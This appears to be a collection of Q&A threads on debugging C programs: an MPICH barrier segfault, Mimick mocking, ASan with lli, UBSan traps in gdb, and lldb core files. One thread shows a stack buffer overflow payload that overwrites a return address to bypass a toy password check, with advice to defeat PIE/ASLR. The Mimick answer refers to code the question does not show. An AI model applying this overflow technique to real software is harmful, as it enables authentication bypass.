Segmentation fault while using MPI_Barrier in `libpmpi.12.dylib`

I installed MPICH using brew install mpich, but whenever I call MPI_Barrier, I get a segmentation fault. See the simple code below:
// A.c
#include "mpi.h"
#include <stdio.h>
int main(int argc, char *argv[])
{
    int rank, nprocs;
    MPI_Init(&argc,&argv);
    MPI_Comm_size(MPI_COMM_WORLD,&nprocs);
    MPI_Comm_rank(MPI_COMM_WORLD,&rank);
    MPI_Barrier(MPI_COMM_WORLD);
    printf("Hello, world. I am %d of %d\n", rank, nprocs);
    fflush(stdout);
    MPI_Finalize();
    return 0;
}
mpicc A.c -g -O0 -o A
After running mpirun -n 2 ./A, I got the error below:
===================================================================================
= BAD TERMINATION OF ONE OF YOUR APPLICATION PROCESSES
= PID 60914 RUNNING AT pivotal.lan
= EXIT CODE: 139
= CLEANING UP REMAINING PROCESSES
= YOU CAN IGNORE THE BELOW CLEANUP MESSAGES
===================================================================================
YOUR APPLICATION TERMINATED WITH THE EXIT STRING: Segmentation fault: 11 (signal 11)
This typically refers to a problem with your application.
Please see the FAQ page for debugging suggestions
The detailed stack trace from lldb -c /cores/core.60914:
(lldb) target create --core "core.60914"
warning: (x86_64) /cores/core.60914 load command 82 LC_SEGMENT_64 has a fileoff + filesize (0x27d3b000) that extends beyond the end of the file (0x27d3a000), the segment will be truncated to match
warning: (x86_64) /cores/core.60914 load command 83 LC_SEGMENT_64 has a fileoff (0x27d3b000) that extends beyond the end of the file (0x27d3a000), ignoring this section
Core file '/cores/core.60914' (x86_64) was loaded.
(lldb) bt
* thread #1: tid = 0x0000, 0x000000010176f432 libpmpi.12.dylib`MPID_Request_create + 244, stop reason = signal SIGSTOP
* frame #0: 0x000000010176f432 libpmpi.12.dylib`MPID_Request_create + 244
frame #1: 0x000000010178d2fa libpmpi.12.dylib`MPID_Isend + 152
frame #2: 0x0000000101744d6f libpmpi.12.dylib`MPIC_Sendrecv + 351
frame #3: 0x00000001016861df libpmpi.12.dylib`MPIR_Barrier_intra + 401
frame #4: 0x00000001016866f2 libpmpi.12.dylib`MPIR_Barrier + 67
frame #5: 0x0000000101686789 libpmpi.12.dylib`MPIR_Barrier_impl + 90
frame #6: 0x00000001016860fb libpmpi.12.dylib`MPIR_Barrier_intra + 173
frame #7: 0x00000001016866f2 libpmpi.12.dylib`MPIR_Barrier + 67
frame #8: 0x0000000101686789 libpmpi.12.dylib`MPIR_Barrier_impl + 90
frame #9: 0x00000001015a8ed9 libmpi.12.dylib`MPI_Barrier + 820
frame #10: 0x0000000101590ed8 a.out`main(argc=1, argv=0x00007fff5e66fa40) + 88 at b.c:11
frame #11: 0x00007fff8f7805ad libdyld.dylib`start + 1
The usage is copied from the official guide. What is wrong with the MPI_Barrier implementation in libmpi.12.dylib? Thanks.

Related

Stack not 16-byte aligned error when mocking exit with Mimick

I'm using Mimick to mock the exit function, but I get a "stack not 16-byte aligned" error.
Here's a reduced code example:
#include <stdlib.h>
#include <mimick.h>
mmk_mock_define(exit_mock, void, int);
int main(void) {
    mmk_mock("exit#self", exit_mock);
    exit(EXIT_FAILURE);
    mmk_reset(exit);
    return 0;
}
Compiled with the following on macOS 11:
clang -I ./include -g -rpath ./lib/ -Wl,-segalign,1000 -L ./lib/ -l mimick -o test test.c
where Mimick has already been compiled and installed to ./lib and ./include.
Running with: lldb ./test
lldb gives me:
(lldb) target create "test"
Current executable set to '/Users/camdennarzt/Developer/C/test/test' (x86_64).
(lldb) r
Process 94625 launched: '/Users/camdennarzt/Developer/C/test/test' (x86_64)
Process 94625 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
frame #0: 0x00007fff20531c9e libdyld.dylib`stack_not_16_byte_aligned_error
libdyld.dylib`stack_not_16_byte_aligned_error:
-> 0x7fff20531c9e <+0>: movdqa %xmm0, (%rsp)
0x7fff20531ca3 <+5>: int3
0x7fff20531ca4 <+6>: nop
0x7fff20531ca5 <+7>: nop
Target 0: (test) stopped.
(lldb) bt
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
* frame #0: 0x00007fff20531c9e libdyld.dylib`stack_not_16_byte_aligned_error
frame #1: 0x00007ffeefbfefc8
frame #2: 0x0000000100001941 test`mmk_mock_create_internal + 289
frame #3: 0x0000000100003315 test`mmkuser_exit_mock_create(tgt="\x80&", opts=(sentinel_ = 0, noabort = 0)) at test.c:4:1
frame #4: 0x00000001001ae010
frame #5: 0x00007fff20532f3d libdyld.dylib`start + 1
frame #6: 0x00007fff20532f3d libdyld.dylib`start + 1
Because I saw this, I also tried compiling with -fno-stack-check -mmacosx-version-min=10.14, but it didn't help. I also tried a Homebrew-installed clang, but that didn't help either.
What am I doing wrong here? Or is there a bug in a library/compiler I'm using?
I do not know Criterion/Mimick, so this may or may not make a difference.
If params[i].argv is meant to mimic main()'s argv, then the terminating null pointer at .argv[argc] is missing:
argv[argc] shall be a null pointer.
C17 spec, 5.1.2.2.1.
params[0].argc = 1;
params[0].argv = cr_malloc(sizeof(char*) * 2 /* not 1 */);
params[0].argv[0] = cr_strdup("progname");
params[0].argv[1] = NULL; /* add */
Likewise for the other params[i]; free_parse_args() also needs to be updated to match.
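A minimal plain-C sketch of the same fix, assuming ordinary malloc/free in place of Criterion's cr_malloc/cr_strdup (the helper names dup_str, make_args and free_args are hypothetical, not Criterion or Mimick API): allocate argc + 1 slots, store NULL in the last one, and let the cleanup routine stop at that terminator.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: duplicate a string with malloc
   (portable stand-in for strdup/cr_strdup). */
static char *dup_str(const char *s)
{
    size_t n = strlen(s) + 1;
    char *p = malloc(n);
    if (p != NULL)
        memcpy(p, s, n);
    return p;
}

/* Hypothetical helper: build an argv-style array of argc strings plus the
   terminating null pointer that main()'s argv has (argv[argc] == NULL). */
static char **make_args(int argc, const char *const words[])
{
    char **argv = malloc(sizeof(char *) * ((size_t)argc + 1)); /* +1 for the NULL slot */
    if (argv == NULL)
        return NULL;
    for (int i = 0; i < argc; i++) {
        argv[i] = dup_str(words[i]);
        if (argv[i] == NULL) {           /* roll back on allocation failure */
            for (int j = 0; j < i; j++)
                free(argv[j]);
            free(argv);
            return NULL;
        }
    }
    argv[argc] = NULL;                   /* the terminator that was missing */
    return argv;
}

/* Hypothetical counterpart of free_parse_args(): walk until the NULL terminator. */
static void free_args(char **argv)
{
    if (argv == NULL)
        return;
    for (char **p = argv; *p != NULL; p++)
        free(*p);
    free(argv);
}
```

Because free_args() walks until the NULL slot, it needs no separate element count, which is the kind of change free_parse_args() would need once the terminator is in place.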

How can I use AddressSanitizer in lli (LLVM)?

I would like to run bitcode compiled with -fsanitize=address in lli, but when I run it, it crashes with a segmentation fault.
$ cat sample.c
#include <stdlib.h>
void *p;
int main() {
    p = malloc(7);
    return 0;
}
$ clang -emit-llvm -fsanitize=address -c -g sample.c
$ lli sample.bc
Stack dump:
0. Program arguments: lli sample.bc
0 lli 0x000000010c112d9c llvm::sys::PrintStackTrace(llvm::raw_ostream&) + 37
1 lli 0x000000010c11319e SignalHandler(int) + 192
2 libsystem_platform.dylib 0x00007fff603e2b3d _sigtramp + 29
3 libsystem_platform.dylib 000000000000000000 _sigtramp + 2680280288
4 lli 0x000000010be3ff74 llvm::ExecutionEngine::runStaticConstructorsDestructors(llvm::Module&, bool) + 310
5 lli 0x000000010beac842 llvm::MCJIT::runStaticConstructorsDestructors(bool) + 388
6 lli 0x000000010bb715c6 main + 8866
7 libdyld.dylib 0x00007fff601f7ed9 start + 1
Segmentation fault: 11
Sanitized code requires special runtime support, which is implemented in the ASan runtime library. lli does not load this library by default (because users normally don't need it), so you need to request it explicitly via LD_PRELOAD=libasan.so.VER. Note that libasan.so is the GCC naming convention; for Clang you may need something like libclang_rt.asan.XXX. (On macOS, as in the stack dump above, the dynamic loader's equivalent of LD_PRELOAD is DYLD_INSERT_LIBRARIES.) You can determine the full library paths via:
GCC_ASAN_PRELOAD=$(gcc -print-file-name=libasan.so)
CLANG_ASAN_PRELOAD=$(clang -print-file-name=libclang_rt.asan-x86_64.so)

Can't overwrite return address outside of gdb

I am trying to use a stack buffer overflow to redirect the return address. My goal is to overwrite the return address within the check_auth function so that main continues at line 22 (printf("GRANTED\n");). Here is the C code:
fugi#calc:~/Desktop$ gcc -g auth_overflow.c -o auth_overflow
fugi#calc:~/Desktop$ gdb auth_overflow -q
Reading symbols from auth_overflow...done.
(gdb) list 1
1 #include <stdio.h>
2 #include <stdlib.h>
3 #include <string.h>
4
5 int check_auth(char *pass){
6 char pass_buff[16];
7 int auth_flag = 0;
8 strcpy(pass_buff, pass);
9
10 if(strcmp(pass_buff, "yes") == 0)
(gdb)
11 auth_flag = 1;
12 return auth_flag;
13 }
14
15 int main( int argc, char *argv[]){
16 if(argc < 2){
17 printf("Usage: %s <password>\n\n", argv[0]);
18 exit(0);
19 }
20 if(check_auth(argv[1])){
(gdb)
21 printf("ACCESS\n");
22 printf("GRANTED\n");
23 }
24 else{
25 printf("\n Access Denied\n");
26 }
27 return 0;
28 }
I am using gdb on a 64-bit Debian system to debug the code.
My problem is, the overwriting doesn't work outside of gdb.
I know that the saved return address (which points back into main) and the beginning of the input buffer (pass_buff) are 40 bytes apart.
(gdb) i f
Stack level 0, frame at 0x7fffffffe170:
rip = 0x55555555477d in check_auth (auth_overflow.c:8); saved rip = 0x555555554800
called by frame at 0x7fffffffe190
source language c.
Arglist at 0x7fffffffe160, args: pass=0x7fffffffe562 'A' <repeats 56 times>
Locals at 0x7fffffffe160, Previous frame's sp is 0x7fffffffe170
Saved registers:
rbp at 0x7fffffffe160, rip at 0x7fffffffe168
(gdb) x/x *0x7fffffffe168
0x55554800: Cannot access memory at address 0x55554800
(gdb) x/x pass_buff
0x7fffffffe140: 0x00000001
(gdb) p 0x7fffffffe168 - 0x7fffffffe140
$1 = 40
So, when I do this:
(gdb) run `python -c 'print("A"*40 + "\x10\x48\x55\x55\x55\x55")'`
Starting program: /home/fugi/Desktop/auth_overflow `python -c 'print("A"*40 + "\x10\x48\x55\x55\x55\x55")'`
GRANTED
Program received signal SIGBUS, Bus error.
main (argc=<error reading variable: Cannot access memory at address 0x414141414141413d>,
argv=<error reading variable: Cannot access memory at address 0x4141414141414131>) at auth_overflow.c:28
28 }
But when I do it without gdb it doesn't work:
fugi#calc:~/Desktop$ ./auth_overflow `python -c 'print("A"*40 + "\x10\x48\x55\x55\x55\x55")'`
Segmentation fault
What can I do to make this work?
I also tried to do this by repeating the address, but the problem is that I can't pass null bytes on the command line:
(gdb) x/12xg $rsp
0x7fffffffe130: 0x00007fffffffe156 0x00007fffffffe56c
0x7fffffffe140: 0x4141414141414141 0x4141414141414141
0x7fffffffe150: 0x4141414141414141 0x4141414141414141
0x7fffffffe160: 0x4141414141414141 **0x0000555555554810**
0x7fffffffe170: 0x00007fffffffe268 0x0000000200000000
0x7fffffffe180: 0x0000555555554840 0x00007ffff7a57561
To make the address fit, I need to add \x00\x00, but then I get:
fugi#calc:~/Desktop$ ./auth_overflow `python -c 'print("A"*40 + "\x10\x48\x55\x55\x55\x55\x00\x00")'`
**bash: warning: command substitution: ignored null byte in input**
Segmentation fault
Is there a way to repeat the address like this?
Thanks for your help in advance.
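I don't know the exact build settings in your environment, but I can guess at some problems.
On current Linux distributions, PIE (Position-Independent Executable) is enabled by default, which means your target address is not always 0x0000555555554810: with ASLR, the executable is loaded at a different base address on each run. gdb disables address randomization by default (set disable-randomization on), which is why the address stays fixed inside gdb. To check this, add this code to the main function:
printf("CODE: %p\n", (void*)main);
If this prints the same address on every run outside gdb, PIE is effectively disabled.
An argv argument cannot contain a NUL byte (other than its terminator), but this is not a critical problem: x86-64 systems use only the low 6 bytes of a user-space virtual address, the saved return address already has zeros in its two high bytes, and strcpy() also writes one NUL terminator after the copied bytes.
To build without PIE, use -no-pie: gcc main.c -o main -no-pie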
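To illustrate why the two high zero bytes can be left off, here is a small sketch that lays out the argument bytes, assuming a little-endian x86-64 target, the 40-byte offset measured in the question, and a fixed (non-randomized) address; encode_overwrite and high_zero_bytes are hypothetical helper names. Writing 40 filler bytes followed by the low 6 bytes of 0x0000555555554810 reproduces the \x10\x48\x55\x55\x55\x55 sequence from the question.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: fill buf with `pad` filler bytes ('A') followed by the
   low `addr_bytes` bytes of `addr` in little-endian (x86-64) byte order.
   Returns the number of bytes written, or 0 if the request does not fit. */
static size_t encode_overwrite(unsigned char *buf, size_t cap, size_t pad,
                               uint64_t addr, size_t addr_bytes)
{
    if (addr_bytes > 8 || pad + addr_bytes > cap)
        return 0;
    memset(buf, 'A', pad);
    for (size_t i = 0; i < addr_bytes; i++)
        buf[pad + i] = (unsigned char)(addr >> (8 * i)); /* least significant byte first */
    return pad + addr_bytes;
}

/* Hypothetical helper: count the high-order zero bytes of a 64-bit address.
   These are the bytes that cannot travel through argv but can be omitted. */
static int high_zero_bytes(uint64_t addr)
{
    int n = 0;
    for (int i = 7; i >= 0 && ((addr >> (8 * i)) & 0xFF) == 0; i--)
        n++;
    return n;
}
```

For 0x0000555555554810, high_zero_bytes() reports 2, so only 6 address bytes need to be sent; this only helps while the address itself is stable, which is what the PIE/ASLR check above is about.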
If you're asking how to use the return value of check_auth(), I'd do this:
int main( int argc, char *argv[]){
    if(argc < 2){
        printf("Usage: %s <password>\n\n", argv[0]);
        exit(0);
    }
    int flag = check_auth(argv[1]);
    if(flag){
        printf("ACCESS\n");
        printf("GRANTED\n");
    }else{
        printf("\n Access Denied\n");
    }
    return flag;
}
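For comparison, a minimal sketch (not part of either answer) of a check_auth() that keeps the question's interface but refuses input that would not fit in pass_buff, so the overflow explored above cannot happen. The length check is one option among several; comparing pass directly with strcmp() and dropping the local buffer would also work.

```c
#include <assert.h>
#include <string.h>

/* Sketch: same logic as the question's check_auth(), but the copy into
   pass_buff only happens when the input (plus its NUL) fits. */
int check_auth(const char *pass)
{
    char pass_buff[16];
    int auth_flag = 0;

    if (strlen(pass) >= sizeof pass_buff)   /* too long: would overflow pass_buff */
        return 0;
    strcpy(pass_buff, pass);                /* safe: length checked above */

    if (strcmp(pass_buff, "yes") == 0)
        auth_flag = 1;
    return auth_flag;
}
```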
My main language is Java, actually, so if I'm wrong, please correct me. I'm trying to learn C as we speak.

How can I break on multiple clang/ubsan warnings in gdb?

Take the following test program (compiled with clang 3.4 and run under gdb 7.6.1):
#include <limits.h>
#include <stdio.h>
int main(void)
{
    int a = INT_MAX + 1;
    int b = INT_MAX + 2;
    printf("Result: a = %d, b = %d\n", a, b);
}
I would like to be able to use gdb to automatically stop at the second occurrence of undefined behaviour here (int b = ...).
If I compile with:
clang -fsanitize=undefined -O0 -ggdb3 -o test test.c
...then running the program under gdb just results in it running to completion:
test.c:6:21: runtime error: signed integer overflow: 2147483647 + 1 cannot be represented in type 'int'
test.c:7:21: runtime error: signed integer overflow: 2147483647 + 2 cannot be represented in type 'int'
Result: a = -2147483648, b = -2147483647
[Inferior 1 (process 24185) exited normally]
But if I use:
clang -fsanitize=undefined-trap -fsanitize-undefined-trap-on-error -O0 -ggdb3 -o test test.c
...then I can't continue past the first occurrence:
Program received signal SIGILL, Illegal instruction.
0x0000000000400556 in main () at test.c:6
6 int a = INT_MAX + 1;
(gdb) c
Continuing.
Program terminated with signal SIGILL, Illegal instruction.
The program no longer exists.
Is it possible to get gdb to break when (and only when) undefined behaviour is flagged, but to let the program continue otherwise? I'm after a technique that will work not just on this example, but in general, where the offending line might be inside a loop, the values may be determined at runtime, etc.
On x86-64, the instruction that raises SIGILL and stops the program is ud2 (http://asm.inightmare.org/opcodelst/index.php?op=UD2). To achieve your goal, you can change how gdb handles SIGILL and then jump over the instruction; ud2 is 2 bytes long (0f 0b), so add 2 to $pc on x86-64:
This is how the instruction ud2 is placed in the code of your test program on x86_64:
0x00000000004004f0 <+32>: 0f 85 02 00 00 00 jne 0x4004f8 <main+40>
=> 0x00000000004004f6 <+38>: 0f 0b ud2
0x00000000004004f8 <+40>: b8 ff ff ff 7f mov $0x7fffffff,%eax
These are the gdb commands you need:
handle SIGILL stop print nopass
set $pc = $pc + 2
This is an example for your test program:
$ gdb -q ./test
Reading symbols from /home/test...done.
(gdb) handle SIGILL stop print nopass
Signal Stop Print Pass to program Description
SIGILL Yes Yes No Illegal instruction
(gdb) r
Starting program: /home/test
Program received signal SIGILL, Illegal instruction.
0x00000000004004f6 in main () at test.c:6
6 int a = INT_MAX + 1;
(gdb) set $pc = $pc + 2
(gdb) c
Continuing.
Program received signal SIGILL, Illegal instruction.
0x000000000040051f in main () at test.c:7
7 int b = INT_MAX + 2;
(gdb) set $pc = $pc + 2
(gdb) c
Continuing.
Result: a = -2147483648, b = -2147483647
[Inferior 1 (process 7898) exited normally]
(gdb)
Useful links:
http://sourceware.org/gdb/current/onlinedocs/gdb/Jumping.html#Jumping
http://sourceware.org/gdb/current/onlinedocs/gdb/Signals.html#Signals

Analyzing a .dSYM file using lldb

I wrote a simple C program that uses assert(). I'd like to analyze it using lldb.
OS in use: OS X Mavericks
Compiler used to compile:
Apple LLVM version 5.0 (clang-500.2.79) (based on LLVM 3.3svn)
Target: x86_64-apple-darwin13.0.0
Thread model: posix
The -g compiler option generated a .dSYM directory. I want to know how to analyze the resulting core file using lldb.
PS: I have compiled using the -g option (clang -g test.c)
Start lldb and then execute the command
target create --core /cores/core.NNNN
where "/cores/core.NNNN" is your core file. A simple example:
$ lldb
(lldb) target create --core /cores/core.5884
Core file '/cores/core.5884' (x86_64) was loaded.
Process 0 stopped
* thread #1: tid = 0x0000, 0x00007fff8873c866 libsystem_kernel.dylib`__pthread_kill + 10, stop reason = signal SIGSTOP
frame #0: 0x00007fff8873c866 libsystem_kernel.dylib`__pthread_kill + 10
libsystem_kernel.dylib`__pthread_kill + 10:
-> 0x7fff8873c866: jae 0x7fff8873c870 ; __pthread_kill + 20
0x7fff8873c868: movq %rax, %rdi
0x7fff8873c86b: jmpq 0x7fff88739175 ; cerror_nocancel
0x7fff8873c870: ret
(lldb) bt
* thread #1: tid = 0x0000, 0x00007fff8873c866 libsystem_kernel.dylib`__pthread_kill + 10, stop reason = signal SIGSTOP
frame #0: 0x00007fff8873c866 libsystem_kernel.dylib`__pthread_kill + 10
frame #1: 0x00007fff85de835c libsystem_pthread.dylib`pthread_kill + 92
frame #2: 0x00007fff87554bba libsystem_c.dylib`abort + 125
frame #3: 0x00007fff8751ea5f libsystem_c.dylib`__assert_rtn + 321
frame #4: 0x000000010c867f59 a.out`main(argc=1, argv=0x00007fff53398c50) + 89 at prog.c:7
frame #5: 0x00007fff872b65fd libdyld.dylib`start + 1
(lldb) frame select 4
frame #4: 0x000000010c867f59 a.out`main(argc=1, argv=0x00007fff53398c50) + 89 at prog.c:7
4 int main(int argc, char **argv)
5 {
6 int i = 0;
-> 7 assert(i != 0);
8 return 0;
9 }
10
(lldb) p i
(int) $0 = 0
At the command prompt, in the same directory where you have the .dSYM directory, type
lldb program-name
and then use the commands you need, as listed in this official GDB to LLDB command map:
lldb-gdb
